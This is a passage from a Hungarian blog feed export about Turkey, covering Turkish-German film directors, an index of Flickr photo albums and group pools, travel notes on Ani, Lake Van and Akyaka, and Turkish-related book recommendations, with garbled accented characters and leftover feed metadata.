szimplifikבlt, sablonos. Ezzel egytt meg kell nיzni, יlvezetes. </p><p align="justify">A mבsik Akin-film a "<strong>Jתliusban</strong>", ez is jף, embersיges יs szףrakoztatף film, egy igazi tצrצk road-movie, ezt sem szabad kihagyni, szףrakoztatףak a Magyarorszבgon forgatott epizףdok is. </p><p align="justify">A "<strong>Fallal szemben</strong>", a harmadik film, a legnagyobb Akin-mű, sokszor vיres יs kegyetlen, engem helyenkיnt a Monica Bellucci-fיle Irrיvיrsible-re emlיkeztet. Lבtni kell!!</p><p align="justify">Akin (31) Nיmetorszבgban יl, most forgatja a "Hםdon" c. filmjיt, a hםd Isztambulban talבlhatף - aki pedig rajta בll, fיl lבbbal Eurףpבban, fיllel ֱzsiבban van. </p><p>ֽrבsok a rendezőről יs filmjeiről: <a href="http://www.filmkultura.hu/2004/articles/reviews/berlin04.hu.html#top">1</a> <a href="http://www.filmkultura.iif.hu:8080/2001/articles/profiles/fatih.hu.html">2 </a><a href="http://www.c3.hu/scripta/filmvilag/0105/vagvolgyi.htm">3</a> <a href="http://www.magyar.film.hu/object.af617576-9f71-4bdb-b1f9-15d0fe084b3e.ivy">4</a> <a href="http://www.cinematrix.hu/hirveg.php?hir_id=12636">5 </a><a href="http://www.german-cinema.de/archive/film_view.php?film_id=993">6</a> 7 <a href="http://www.berlinale.de/en/service/preise/preise2004/f_main.html">8</a> <a href="http://www.nepszava.hu/default.asp?cCenter=article.asp&nID=692057">9</a> <a href="http://homepages.gold.ac.uk/turkishmigrantcinema/films/films/film4.htm">10</a> </p><p><strong><span style="font-size:130%;color:#ff0000;">DERVIS ZAIM</span></strong></p><p><p align="justify"><em><span style="color:#ff0000;"></span></em></p><strong>Dervis Zaim</strong> "Sבr" (Camur/Mud) filmje 2003-ban megkapta az UNESCO klצndםjבt a Velencei Filmfesztivבlon. A rendező korבbbi filmje, az "Elefבntok יs a fű" (Filler ve cimen) 2001-ben az Isztambuli Filmfesztivבlon elnyerte a nemzetkצzi filmkritikusok klצndםjבt.<p></p><p>Zaimrףl יs filmjeiről: <a href="http://www.ujszo.com/clanok.asp?vyd=20030903&amp;cl=67881">1</a> <a href="http://www.filmfestival.gr/2003/uk/process.php?movieid=706&eventid=128">2</a> <a href="http://www.filmfestival.gr/2003/uk/44filmfest_archive_item.rhtml?id=272">3</a> <a href="http://www.cineuropa.org/article_sp.asp?documentID=36781&amp;treeID=458&lang=ing">4</a> <a href="http://www.turkishtime.org/20/print/119_1_en_p.asp">5</a> <a href="http://www.fipresci.org/festivals/archive/2004/valencia/valencia2004_kragic.htm">6</a> <a href="http://www.filmkultura.iif.hu:8080/articles/review/istan.hu.html">7</a> <a href="http://www.labiennale.org/en/cinema/60thmostra/catalogue/index.php?titolo=167&amp;scregista=101">8</a> <a href="http://www.filmkultura.hu/2001/news/archive/fipresci.hu.html">9</a> 10 </p><p><strong><span style="font-size:130%;color:#ff0000;">AYSE POLAT</span></strong></p><p><strong>En Garde - Ayse Polat filmje a Locarnoi Filmfesztivבlon</strong></p><p align="justify">Folytatףdik a Nיmetorszבgban יlő tצrצk rendezők sikersorozata. Ayse Polat (34) tצrצk-kurd szבrmazבsת filmrendező mבsodik jבtיkfilmje a 2004. augusztus 14-יn vיget יrt fesztivבlon Ezst Leopבrdot kapott, vagyis a mבsodik legjobb film dםjבt nyerte el. A film kיt női főszereplője Pinar Erincin יs Maria Kwiatkowsky, mindketten megkaptבk a legjobb női alakםtבs dםjבt. A film 2004. őszיn kerl a mozikba, remיlhetőleg Magyarorszבgon is.<br /><br />Linkek: <a href="http://2004.pardo.ch/pardo/director.do?lang=e&id=79555">1</a> <a href="http://www.welt.de/data/2004/08/16/319858.html">2</a> <a href="http://www.german-cinema.de/archive/film_person_view.php?film_person_id=400">3</a> <a href="http://www.milliyet.com.tr/2004/08/04/pazar/paz02.html">4</a> <a href="http://www.radikal.com.tr/haber.php?haberno=125107&amp;tarih=16/08/2004">5</a> <a href="http://movies2.nytimes.com/gst/movies/movie.html?v_id=251910">6</a> <a href="http://www.x-verleih.de/x-verleih/neu.jsp?news_id=145">7</a> <a href="http://www.radikal.com.tr/veriler/2004/08/16/haber_125108.php">8</a> 9 10</p><p align="justify"><span style="font-size:130%;color:#ff0000;"><strong>NEM TײRײK RENDEZŐK FILMJEI, DE SZֹPEK ֹS KAPCSOL׃DNAK A TײRײKײKHײZ: </strong></span></p><p><strong><span style="color:#ff0000;">Monsieur Ibrahim יs a Korבn virבgai: </span></strong> a filmről <a href="http://www.premierpark.hu/cikk.php?cikk=1008076">itt</a> יs <strong><a href="http://www.suttogo.freeblog.hu/">Suttogף blogjבn</a></strong> olvashatsz.</p><p></p> -false - - - - -Efendi - -2004-07-26T09:54:15+02:00 -2004-11-16T22:34:15Z -2004-07-26T08:07:56Z - -tag:blogger.com,1999:blog-7074887.post-109082927691028782 -Turkolףgus יs hungarolףgus hallgatףk fףruma / Magyar irodalom tצrצkl/Tצrצk nyelv יs nיprajz - -
    -
    Ebbe a postba elsősorban a magyarorszבgi יs a tצrצkorszבgi turkolףgus, illetve hungarolףgus hallgatףk, a vיgzettek, meg a kיpzיs irבnt יrdeklődők zeneteit יs vיlemיnyיt vבrjuk. Ide םrjon az is, akit יrdekel a tצrצk nyelv יs a nיprajz יs erről szeretne vיlemיnyt cserיlni. A postban hםvnבnk fel a figyelmet a Tצrצkorszבgban megjelenő magyar, vagy Magyarorszבggal kapcsolatos irodalmi művekre is. -
    -
    - -
    -
    -
    -false -
    - - - -Efendi - -2004-07-23T23:44:00+02:00 -2005-04-27T22:21:52Z -2004-07-23T22:03:17Z - -tag:blogger.com,1999:blog-7074887.post-109062019774217023 -A blog fיnykיpalbuma / Tצrצk fotףművיszek lapjai -<div align="center"><a title="Photo Sharing" href="http://www.flickr.com/photos/efendi/6446684/"><img height="375" alt="Girls" src="http://photos7.flickr.com/6446684_9f4346ddb7.jpg" width="500" /></a> </div><br /><div align="justify"></div><div align="justify"><span style="color:#ff0000;"><strong>Ezen a poston az alבbbi linkeket talבlod:</strong></span></div><span style="color:#ff0000;"><strong></strong></span><div align="justify"><br /></div><div align="justify"><span style="color:#ff0000;"><strong>I. Efendi fotףalbumai </strong></span></div><div align="justify"><span style="color:#ff0000;"><strong>II. Efendi יs a Flickr tagjainak kצzצs albumai</strong></span></div><div align="justify"><strong><span style="color:#ff0000;">III. E blog lבtogatףinak kצzצs fיnykיpalbuma</span></strong></div><div align="justify"><strong><span style="color:#ff0000;">IV. Tצrצk fotףművיszek kיpei יs linkjei</span></strong></div><div align="justify"><strong><span style="color:#ff0000;">V. A Magyarorszבgon kaphatף fotףalbumok Tצrצkorszבgrףl</span></strong></div><div align="justify"><strong><span style="color:#ff0000;">----------------------------------------------</span></strong></div><div align="justify"><strong><span style="color:#ff0000;"></span></strong></div><div align="justify"><strong><span style="color:#ff0000;"></span></strong></div><div align="justify"><strong><span style="color:#ff0000;"></span></strong></div><div align="justify"><span style="color:#ff0000;"><strong>I. Efendi fotףalbumai (FLICKR + BLOG): </strong></span></div><div align="justify"><strong><span style="color:#ff0000;"></span></strong><br /></div><div align="justify"></div><div align="justify">A főbejבrat itt van (<a href="http://www.flickr.com/photos/efendi/">EZEN A LINKEN</a>), de kצzvetlenl belיphetsz az egyes albumokba is, םgy:</div><div align="justify"><br /></div><div align="justify"></div><div align="justify">Ha az alבbbi albumok nevיre klikkelsz, akkor a Flickren lיvő albumot lבthatod, ha pedig az album neve melletti "POST" linkre kattintasz, az ezen a blogon lיvő albumokra vonatkozף magyar nyelvű szצveges ismertetőket olvashatod:</div><div align="justify"><br /></div><div align="justify"></div><div align="justify"></div><div align="justify"></div><div align="justify"><a href="http://pg.photos.yahoo.com/ph/efendi_online/album?.dir=cc76&.src=ph&amp;store=&prodid=&amp;.done=http%3a//pg.photos.yahoo.com/ph/efendi_online/my_photos"></a></div><div align="justify">1. <a href="http://www.flickr.com/photos/efendi/sets/94506/">Akyaka/Gצkovai-צbצl</a> + <a href="http://torokorszag.blogspot.com/2004/06/akyaka-gkova_06.html">POST</a></div><div align="justify">2. <a href="http://www.flickr.com/photos/efendi/sets/33375/">Ankara</a></div><div align="justify">3. <a href="http://www.flickr.com/photos/efendi/sets/44391/">Ani צrmיny romvבros</a> + <a href="http://torokorszag.blogspot.com/2004/07/ani.html">POST</a> </div><div align="justify">4. <a href="http://www.flickr.com/photos/efendi/sets/44896/">Antakya/Hatay/Antioche</a> </div><div align="justify">5. <a href="http://www.flickr.com/photos/efendi/sets/36935/">Beypazari</a></div><div align="justify">6. <a href="http://www.flickr.com/photos/efendi/sets/148879/">Bursa</a></div><div align="justify">7. <a href="http://www.flickr.com/photos/efendi/sets/93456/">Cica</a></div><div align="justify">8. <a href="http://www.flickr.com/photos/efendi/sets/144691/">Diyarbakir</a></div><div align="justify">9. <a href="http://www.flickr.com/photos/efendi/sets/146094/">Fekete-tenger</a><br />10. <a href="http://www.flickr.com/photos/efendi/sets/33743/">Mardin/Tur Abdin/Mor Gabriel szםr ortodox kolostor </a>+ <a href="http://torokorszag.blogspot.com/2004/09/mardintur-abdinmor-gabriel-szr-ortodox.html">POST</a></div><div align="justify">11. <a href="http://www.flickr.com/photos/efendi/sets/44187/">Musa Dagh/Vakifli צrmיny falu</a></div><div align="justify">12. <a href="http://www.flickr.com/photos/efendi/sets/43825/">Osmaniye/Karatepe-Aslantas</a></div><div align="justify">13. <a href="http://www.flickr.com/photos/efendi/sets/43823/">Osmaniye/Kastabala-Hierapolis</a></div><div align="justify">14. <a href="http://www.flickr.com/photos/efendi/sets/94542/">Safranbolu/Yצrk kצy</a> + <a href="http://torokorszag.blogspot.com/2004/09/safranboluyrk-ky.html">POST</a></div><div align="justify">15. <a href="http://www.flickr.com/photos/efendi/sets/48040/">Seleukia ad Piera/Antioche</a></div><div align="justify">16. <a href="http://www.flickr.com/photos/efendi/sets/144685/">Tatvan</a></div><div align="justify">17. <a href="http://www.flickr.com/photos/efendi/sets/146102/">Tצrצk tבjak</a></div><div align="justify">18. <a href="http://www.flickr.com/photos/efendi/sets/39284/">Tצrצkorszבg kצztיri szobrai</a> + <a href="http://torokorszag.blogspot.com/2004/11/trkorszg-szobrai.html">POST</a></div><div align="justify">19. <a href="http://www.flickr.com/photos/efendi/sets/33540/">Van-tף יs Akdamar</a> + <a href="http://torokorszag.blogspot.com/2004/06/van-t.html">POST</a></div><div align="justify">20. <a href="http://www.flickr.com/photos/efendi/sets/153444/">Tצrצk blog</a></div><div align="justify">21. <a href="http://www.flickr.com/photos/efendi/sets/159314/">Kossuth Mתzeum, Ktahya</a></div><div align="justify"> </div><div align="justify">... meg azףta jף pבr תj album, a<span style="color:#ff0000;"> teljes lista</span> <a href="http://www.flickr.com/photos/efendi/sets/">EZEN A LINKEN</a> van.</div><div align="justify"><br /></div><div align="justify"></div><div align="justify">Ha keresőszavakkal akarsz megtalבlni valamit az יn fotףim kצzצtt, a keresőszavakat <a href="http://www.flickr.com/photos/efendi/tags/">EZEN A LINKEN</a> lבthatod, csak rבjuk kell klikkelni. </div><div align="justify"><br /></div><div align="justify"><a href="http://www.flickr.com/photos/search/">EZEN A LINKEN</a> pedig fיnykיpeket kereshetsz pבr milliף fotף kצzצtt.</div><div align="justify"><br /></div><div align="justify"></div><div align="justify">Van a Flickren a nevem alatt nיhבny album, amelyekben remek fotףk vannak, de azok nem az enyיmek, hanem az alבbbi partnerekי:</div><div align="justify"><br /></div><div align="justify"></div><div align="justify">20. <a href="http://www.flickr.com/photos/efendi/sets/35155/">Glbahar</a></div><div align="justify">21. <a href="http://www.flickr.com/photos/efendi/sets/37015/">Aysun</a></div><div align="justify">22. <a href="http://www.flickr.com/photos/efendi/sets/44848/">Miray</a></div><div align="justify"><br /></div><div align="justify"><a href="http://www.flickr.com/photos/efendi/sets/33375/"></a></div><div align="justify"><strong><span style="color:#ff0000;">II. Efendi יs a Flickr tagjainak kצzצs albumai ("group pools") - ezek egyre bővlnek a vilבg minden rיszיből יrkező fotףkkal:</span></strong></div><div align="justify"><strong><span style="color:#ff0000;"></span></strong><br /></div><div align="justify"><strong><span style="color:#ff0000;"></span></strong></div><div align="justify"><strong><span style="color:#ff0000;"></span></strong></div><div align="justify"><span style="color:#000000;">1. <a href="http://www.flickr.com/groups/efendi_online/">Tצrצkorszבg</a></span></div><div align="justify">2. <a href="http://www.flickr.com/groups/alevibektasi/">Alevi-Bektashi Heritage:</a> Az alevi-bektבsi יs a szתfi hagyomבnyok Tצrצkorszבgban</div><div align="justify">3. <a href="http://www.flickr.com/groups/aramaicheritage/">Aramaic heritage:</a> Az arבmi (sryani) צrצksיg יs a jelen Tצrצkorszבgban</div><div align="justify">4. <a href="http://www.flickr.com/groups/ataturk/">Atatrk</a></div><div align="justify">5. <a href="http://www.flickr.com/groups/byzantium/">Byzantium:</a> Bizבnci emlיkek</div><div align="justify">6. <a href="http://www.flickr.com/groups/kurdistan/">Kurds, Kurdistan, Tirkiye:</a> Kurdok Tצrצkorszבgban</div><div align="justify">7. <a href="http://www.flickr.com/groups/hungariansinturkey/">Hungarians in Turkey and in the Ottoman Empire: </a>Magyar emlיkek Tצrצkorszבgban</div><div align="justify">8. <a href="http://www.flickr.com/groups/jewishheritageinturkey/">Jewish heritage in Turkey:</a> A tצrצkorszבgi zsidףsבg</div><div align="justify">9. <a href="http://www.flickr.com/groups/ottomanarchitecture/">Ottoman architecture: </a>Az Oszmבn Birodalom צrצksיge</div><div align="justify">10. <a href="http://www.flickr.com/groups/people_of_turkey/">People of Turkey: </a>Tצrצkorszבgi emberek</div><div align="justify">11. <a href="http://www.flickr.com/groups/turkish_tiles_and_ceramics/">Art of Turkish Tiles and Ceramics:</a> Tצrצk csempe יs kerבmia</div><div align="justify">12. <a href="http://www.flickr.com/groups/turkish_landscape/">Turkish landscape:</a> Tצrצkorszבgi tבjak</div><div align="justify">13. <a href="http://www.flickr.com/groups/ancient_mosaics_in_turkey/">Ancient Mosaics in Turkey:</a> Rףmai יs bizבnci mozaikok Tצrצkorszבgban</div><div align="justify">14. <a href="http://www.flickr.com/groups/biblical_turkey/">Biblical sites in Turkey: </a>Bibliai emlיkek </div><div align="justify">15. <a href="http://www.flickr.com/groups/hittites/">Hittites:</a> Hettita emlיkek Tצrצkorszבgban</div><div align="justify">16. <a href="http://www.flickr.com/groups/armenianheritage/">Armenian heritage</a>: ײrmיnyek Tצrצkorszבgban</div><div align="justify">17. <a href="http://www.flickr.com/groups/turkish_cat/">Turkish Cat</a>: Az Angora- יs a Van-macskבk</div><div align="justify">18. <a href="http://www.flickr.com/groups/evil_eye/">Evil Eye - Nazar boncuk</a></div><div align="justify"></div><div align="justify"></div><div align="justify"><br /></div><div align="justify"></div><div align="justify"></div><div align="justify"><span style="color:#ff0000;">Ha kedved van beszבllni, regisztrבlj a Flickren vagy keress engem (tanבcsיrt)!</span></div><div align="justify"><br /></div><div align="justify"></div><div align="justify"><strong><span style="color:#ff0000;"></span></strong></div><div align="justify"><strong><span style="color:#ff0000;">Nיhבny mבs יrdekes pool:</span></strong></div><div align="justify"><strong><span style="color:#ff0000;"></span></strong></div><div align="justify"><strong><span style="color:#ff0000;"></span></strong></div><div align="justify"><strong><span style="color:#ff0000;"></span></strong></div><div align="justify"><strong><span style="color:#ff0000;"></span></strong></div><div align="justify"><span style="color:#000000;">- <a href="http://www.flickr.com/groups/hungary/">Magyarorszבg</a></span></div><div align="justify">- <a href="http://www.flickr.com/groups/islam/">Muslim cultures</a> (ez kivבlף!)</div><div align="justify"></div><div align="justify"></div><div align="justify"></div><div align="justify"></div><div align="justify"></div><div align="justify">... יs van mיg sok-sok mבs, a Flickrnek most, 2005 mבrciusבban kb. 300 ezer tagja van.</div><div align="justify"><br /></div><div align="justify"></div><div align="justify"></div><div align="justify"></div><div align="justify"><strong><span style="color:#ff0000;">III. Tצrצk fotףművיszek linkjei: egyik jobb, mint a mבsik</span></strong></div><div align="justify"><br /></div><div align="justify"><strong></strong></div><div align="justify"><a href="http://www.naziftopcuoglu.com/photographs.html"><strong>Nazif Topcuoglu</strong></a><strong> - </strong>jף volna Magyarorszבgon is lבtni</div><div align="justify"><a href="http://www.fsk.org.tr/portfolyo.shtml">Fotograf Sanati Kurumu</a> alkotףinak albumai</div><div align="justify"><a href="http://www.fotograf.net/portfolyo/index.html">fotograf.net</a> alkotףi albumai </div><div align="justify"><a href="http://www.sihirlitur.com/">Haluk ײzצzl</a></div><div align="justify"><a href="http://www.pozitifnegatif.com/sergi.php">pozitifnegatif</a> fotףgalיriבja</div><div align="justify"><a href="http://www.tr-fotografmuzesi.org/index.htm">Balikesiri fotףmתzeum</a></div><div align="justify"><a href="http://www.ifsak.org.tr/sergiler.php">IFSAK (isztambuli amatצrfotףsok) virtuבlis kiבllםtבsa</a></div><div align="justify"><a href="http://www.fotografevi.com/galeri/default.asp">Fotografevi alkotףinak albumai</a></div><div align="justify"><a href="http://www.fototrek.com/galeri.html">Fototrek Fotograf Merkezi</a></div><div align="justify"><a href="http://www.fotografvakfi.org/turkce/">Fotograf Vakfi</a></div><div align="justify"><a href="http://www.fotografya.gen.tr/index.html">Fotografya</a></div><div align="justify"><a href="http://www.fotografdergisi.com/">Fotograf Dergisi</a></div><div align="justify"><a href="http://www.photodigital.com.tr/">PhotoDigital</a></div><div align="justify"><a href="http://www.photoline.com.tr">photoline</a></div><div align="justify"></div><div align="justify"></div><strong></strong><div align="justify"><br /></div><div align="justify"><span style="color:#ff0000;">Igazi unikum: <a href="http://www.gerty.ncl.ac.uk/home/">"The Gertrude Bell Project"</a> - 7000 fotף az 1900-1918. kצzצtti יvekbצl - ײfelsיge titkosgynצkיnek fotףi.</span></div><span style="color:#ff0000;"></span><div align="justify"><br /></div><div align="justify"><span style="color:#ff0000;"><strong>IV. A blog kצzצs fיnykיpalbuma</strong></span></div><div align="justify"><br /></div><div align="justify">Ha van olyan fotףtok, amelyet szםvesen felraknבtok egy kצzצs יs nyilvבnos fיnykיpalbumba, kldjיtek el a <a href="mailto:efendi_online@yahoo.com">cםmemre</a>. Zsrizיs, dםjazבs nincs, mindenki nyer. </div><div align="justify"><br /></div><div align="justify"></div><div align="justify"><span style="color:#000000;">Kיt dolgot kldjetek el a fotףval: egy <strong>szerzői (בl)nevet</strong>, hogy tudjuk, kinek kצszצnjk a műיlvezetet יs a <strong>kיp cםmיt. </strong>Mindenkinek sajבt, nיvre szףlף albuma lesz, s abba kיsőbb תjabb fיnykיpeket kldhetsz.</span></div><div align="justify"><br /></div><div align="justify">Csak JPEG formבtumת kיpek tצlthetők fel. Ha nem ebben a formבtumban kldצd a kיpeidet, az sem baj, kldd תgy, ahogy van, majd בtalakםtom. Bבrmennyi kיpet kldhetsz, a szolgבltatף elfogadja.</div><div align="justify"><br /></div><div align="justify">Fontos: kיt mailt kldjיl - az egyikben legyenek a kיpek, a mבsikban pבr kםsיrő szף, mivel az előbbit a kיpek letצltיse utבn kitצrlצm, hogy ne dagassza a postafiףkomat, az utףbbi viszont megmarad nבlam az e-mail cםmeddel.<br /><br />A kצzצs album <a href="http://pg.photos.yahoo.com/ph/efendi_online/my_photos">erről a linkről</a> lבthatף, nyilvבnos, bבrhonnan a netről elיrhető.</div><div align="justify"><br /></div><div align="justify"></div><div align="justify"></div><div align="justify"><strong><span style="color:#ff0000;">A kצzצs fotףalbum eddigi szerzői:</span></strong></div><strong></strong><div align="justify"><br /></div><div align="justify"><strong></strong></div><div align="justify"></div><div align="justify"><a href="http://pg.photos.yahoo.com/ph/efendi_online/album?.dir=c6aa&.src=ph&amp;store=&prodid=&amp;.done=http%3a//pg.photos.yahoo.com/ph/efendi_online/my_photos"></a></div><div align="justify"><a href="http://pg.photos.yahoo.com/ph/efendi_online/album?.dir=747e&.src=ph&amp;store=&prodid=&amp;.done=http%3a//pg.photos.yahoo.com/ph/efendi_online/my_photos">Mandula</a></div><div align="justify"><a href="http://pg.photos.yahoo.com/ph/efendi_online/album?.dir=bcda&.src=ph&amp;store=&prodid=&amp;.done=http%3a//pg.photos.yahoo.com/ph/efendi_online/my_photos">Katica</a></div><div align="justify"></div><div align="justify"><a href="http://pg.photos.yahoo.com/ph/efendi_online/album?.dir=d2c5&.src=ph&amp;store=&prodid=&amp;.done=http%3a//pg.photos.yahoo.com/ph/efendi_online/my_photos">Nilfer</a></div><div align="justify"><a href="http://pg.photos.yahoo.com/ph/efendi_online/album?.dir=mail&.src=ph&amp;store=&prodid=&amp;.done=http%3a//pg.photos.yahoo.com/ph/efendi_online/my_photos">Ildi</a></div><div align="justify"><a href="http://pg.photos.yahoo.com/ph/efendi_online/album?.dir=a93f&.src=ph&amp;store=&prodid=&amp;.done=http%3a//pg.photos.yahoo.com/ph/efendi_online/my_photos">Ani</a></div><div align="justify"><br /></div><div align="justify"></div><div align="justify"><strong><span style="color:#ff0000;">V. A Magyarorszבgon kaphatף fotףalbumok Tצrצkorszבgrףl</span></strong></div><div align="justify"><br /></div><div align="justify"></div><div align="justify"><a href="http://www.fotohaz.hu/fotoskonyvek/fotoalbumok/fotoalbumlista11.html">Fotףhבz.hu</a></div> -false - - - - -Efendi - -2004-07-20T22:47:28+02:00 -2005-01-08T22:44:28Z -2004-07-20T21:10:04Z - -tag:blogger.com,1999:blog-7074887.post-109035780443281477 -Ani -<div align="center"><img src="http://photos1.blogger.com/img/284/1037/400/ani12.jpg" /> </div><div align="center"><span style="font-size:85%;"><em>Ani/A Megvבltף temploma</em></span></div><div align="justify"> <br />Az egykori צrmיny Bagratida Kirבlysבg fővבrosa, 48 km-re Karstףl, kצzvetlenl a tצrצk-צrmיny hatבron. A vבrost i.e. 350-300-ban alapםtottבk, s az a X-XI. szבzadban יlte fיnykorבt. Ekkor mintegy szבzezer lakosa volt, s csak Bagdad, Konstantinבpoly יs Kairף volt hozzב mיrhető. A legendבk szerinti ezer templombףl mבra tםz maradt, jףrיszt romokban. Itt talבlhatף az első anatףliai szeldzsuk mecset is. A hely fantasztikus! Mבr nem kell kיrni a helyi hatףsבgok engedיlyיt a belיpיshez יs a fיnykיpezיshez, rב kell szבnni azonban fיl napot a bejבrבsבhoz. </div><div align="justify"> <br /></div><div align="justify">A helyszםnen kיszםtett 55 fotףmat <a href="http://www.flickr.com/photos/efendi/sets/44391/">EZEN A LINKEN</a> lehet megnיzni. Nagyon ajבnlom az <a href="http://www.virtualani.freeserve.co.uk/">Anit bemutatף honlap</a> felkeresיsיt, amelynek egyik <a href="http://www.network54.com/Forum/146256"><span style="color:#3333ff;">szegletיben</span></a> tצrצkצk, צrmיnyek יs mבsok vitatkoznak mיg egy ideig a mתltrףl יs a jelenről.</div><div align="justify"> <br /></div><div align="justify"></div><div align="justify"><span style="color:#ff0000;">Ajבnlom mיg:</span></div><div align="justify"> <br /></div><div align="justify"></div><div align="justify"><strong>HORVֱTH ZOLTֱN GYײRGY - GONDOS BֹLA: Ani, az צrmיny fővבros יs magyar vonatkozבsai</strong> ("A szיpsיges templomokat igen gazdag fotףanyaggal ismertetjk, azonban magyar szempontbףl az is klצnlegessיg, hogy Ani יpםtיszete יs rיszben dםszםtőművיszete megdצbbentő hasonlףsבgot mutat a korai romanika egyes jellegzetes magyar emlיkeivel, amelyekről kצnyvnkben - az analףgiבk bemutatבsבra klצnצs hangsתlyt fektetve - szintיn sok-sok fotף lבthatף.") <a href="http://kethollos.hu/termek.php?op=look&kat=konyv_ostort&amp;id=30">LINK ITT</a></div> -false - - - - -Efendi - -2004-06-06T17:15:54+02:00 -2004-11-05T23:22:54Z -2004-06-06T15:20:52Z - -tag:blogger.com,1999:blog-7074887.post-108653525251305274 -Van-tף -<div align="center"><a href="http://photos1.blogger.com/img/284/1037/1024/akdamar08_sphan%20dagi.jpg"><img style="BORDER-RIGHT: #000000 1px solid; BORDER-TOP: #000000 1px solid; MARGIN: 2px; BORDER-LEFT: #000000 1px solid; BORDER-BOTTOM: #000000 1px solid" src="http://photos1.blogger.com/img/284/1037/400/akdamar08_sphan%20dagi.jpg" border="0" /></a> <br /><em><span style="font-size:85%;">A Van-tף יs a Sphan hegy</span></em></div><em><span style="font-size:85%;"><div align="left"> <br /></span></em>A Van-tףrףl יs az Akdamar-szigeten talבlhatף X. szבzadi צrmיny templomrףl kיszlt <a href="http://pg.photos.yahoo.com/ph/efendi_online/album?.dir=cc76&.src=ph&amp;store=&prodid=&amp;.done=http%3a//pg.photos.yahoo.com/ph/efendi_online/my_photos">fotףimat itt lehet megnיzni.</a> Tovבbbi informבciףk יs fיnykיpek <a href="http://www.zlm-concept.org/voyages/turquie/van.html">itt</a> (francia) יs <a href="http://www.geocities.com/Heartland/Bluffs/3583/page4.html">itt</a> (angol). Ez utףbbin gyצnyצrű hבttיrzene hallhatף. A Van-macskבkat keresd a <a href="http://torokorszag.lap.hu/">torokorszag.lap.hu</a> oldalon! </div> -false - - - - -Efendi - -2004-06-06T14:54:14+02:00 -2004-11-05T23:26:14Z -2004-06-06T13:17:55Z - -tag:blogger.com,1999:blog-7074887.post-108652787537598330 -Akyaka-Gצkova -<div align="center"><a href="http://photos1.blogger.com/img/284/1037/1024/gkovai%20bl1.jpg"><img style="BORDER-RIGHT: #000000 1px solid; BORDER-TOP: #000000 1px solid; MARGIN: 2px; BORDER-LEFT: #000000 1px solid; BORDER-BOTTOM: #000000 1px solid" src="http://photos1.blogger.com/img/284/1037/400/gkovai%20bl1.jpg" border="0" /></a> <br /><em><span style="font-size:85%;">A Gצkovai-צbצl</span></em> </div> <br /><div align="justify">Az utazףknak ajבnlom Akyakבt a Gצkovai-צbצlben (ֹgei-tenger). Autףval Muglבtףl <a href="http://www.turkuaz-guide.net/index.html?turkuaz-info.html">30 km-re</a> van Marmaris irבnyבban. Az צbצl יs a termיszet csodבlatos, sok mבs hellyel szemben a part nincs beיpםtve. Sajבt fotףimat <a href="http://pg.photos.yahoo.com/ph/efendi_online/album?.dir=e40c&.src=ph&amp;store=&prodid=&amp;.done=http%3a//pg.photos.yahoo.com/ph/efendi_online/my_photos">ebben az albumban</a> lehet megnיzni. Tovבbbi informבciףkat <a href="http://www.turkuaz-guide.net/index.html?gokova.html">ezen</a> יs <a href="http://www.akyaka.org/index_eng.htm">ezen</a> a linken talבlhattok. Feltיtlenl nיzzיtek meg a <a href="http://www.guide-martine.com/aegean10.asp">Guide Martine</a>-t (angolul יs franciבul) az Akyakבbףl elיrhető lבtnivalףkrףl - Bodrumtףl Marmarison keresztl Fethiyיig, s persze a <a href="http://torokorszag.lap.hu/">torokorszag.lap.hu</a> idevבgף rיszeit is! </div><div align="center"> <br /><a href="http://photos1.blogger.com/img/284/1037/1024/club%20coban%20macskaja2.jpg"><img style="BORDER-RIGHT: #000000 1px solid; BORDER-TOP: #000000 1px solid; MARGIN: 2px; BORDER-LEFT: #000000 1px solid; BORDER-BOTTOM: #000000 1px solid" src="http://photos1.blogger.com/img/284/1037/400/club%20coban%20macskaja2.jpg" border="0" /></a> <br /><em><span style="font-size:85%;">Akyaka cicבja</span></em> </div> -false - - - - -Efendi - -2004-06-05T23:54:34+02:00 -2004-11-10T21:37:34Z -2004-06-05T21:58:04Z - -tag:blogger.com,1999:blog-7074887.post-108647268460070492 -Kצnyv- יs cikkajבnlף/j megjelenיsek -<div align="justify">ֽrjבtok meg, mit יs hol olvashatunk magyarul Tצrצkorszבgrףl יs a tצrצkצkről - kצnyv, תjsבg, folyףirat, vilבghבlף יs mבs. Figyelemfelhםvבs יs kritika egyarבnt dvצzlendő. Inkבbb az תjdonsבgokat kellene ismertetni itt <em>(comments),</em> mert sok minden, ami korבbban megjelent, a <a href="http://torokorszag.lap.hu/">torokorszag.lap.hu </a>oldalon rיszletezve megtalבlhatף. <br /> <br /></div><div align="justify"></div><div align="center"><span style="color:#ff0000;">A kצnyveket az alבbbi helyeken keresheted (elיg beםrni, hogy "tצrצk"):</span> </div><div align="center"><a href="http://www.konyvkereso.hu/netacgi/konyvker/index.pl?ln=M&fm=idxm.htm">Kצnyvkereső</a></div><div align="center"><a href="http://www.libri.hu/">Libri</a> </div><div align="center"><a href="http://www.fokuszonline.hu/cgi-bin/htmlos.cgi/44330.3.11095277856316695007">Fףkusz</a> <br /></div><span style="font-size:85%;"><p><span style="color:#ff0000;">J!</span></p><p>"VAN, AKIT S׃LYOM KARMOL MEG" - modern tצrצk elbeszיlיsek (fordםtotta Tasnבdi Edit)</p><p> <br />Azeri Folksongs. At the Fountained of Music - Sipos Jבnos ~ Akadיmiai Kiadף Rt. , 2004 ~ 8800 Ft</p><p>Bartףk nyomבban Anatףliבban. Hasonlף magyar יs tצrצk dallamok - Sipos Jבnos ~ Balassi Kiadף Kft. , 2002 ~ 2000 Ft </p><p>In the wake of Bartףk in Anatolia - Bartףk nyomבban Anatףliבban (angol ny.) - Sipos Jבnos ~ Eurףpai Folklףr Intיzet , 2000 ~ 3500 Ft ( klfצldi בr: 45 USD ) </p><p>In the wake of Bartףk in Anatolia. Similar Hungarian and Turkish folk tunes (angol ny.) (CD) - Sipos Jבnos ~ Eurףpai Folklףr Intיzet , 2001 ~ 2500 Ft </p><p>Kazakh Folksongs from the Two Ends of the Steppe + CD - Sipos Jבnos ~ Akadיmiai Kiadף Rt. , 2001 ~ 7120 Ft ( klfצldi בr: 69 USD ) </p><p>Tצrצk nיpzene 2. - Sipos Jבnos ~ MTA Zenetudomבnyi Intיzet , 1995 </p><p>ORHAN PAMUK: </span><span style="font-size:85%;">A FEHֹR KASTֹLY <br /></span><span style="font-size:85%;">ORHAN PAMUK: </span><span style="font-size:85%;">AZ J ֹLET </span> <br /><span style="font-size:85%;">"A PASA FIA MEG A VILֱGSZֹPE" - tצrצk nיpmesיk <br /></span><span style="font-size:85%;">"A SֱMֱNHIT EMLֹKEI - TײRײK 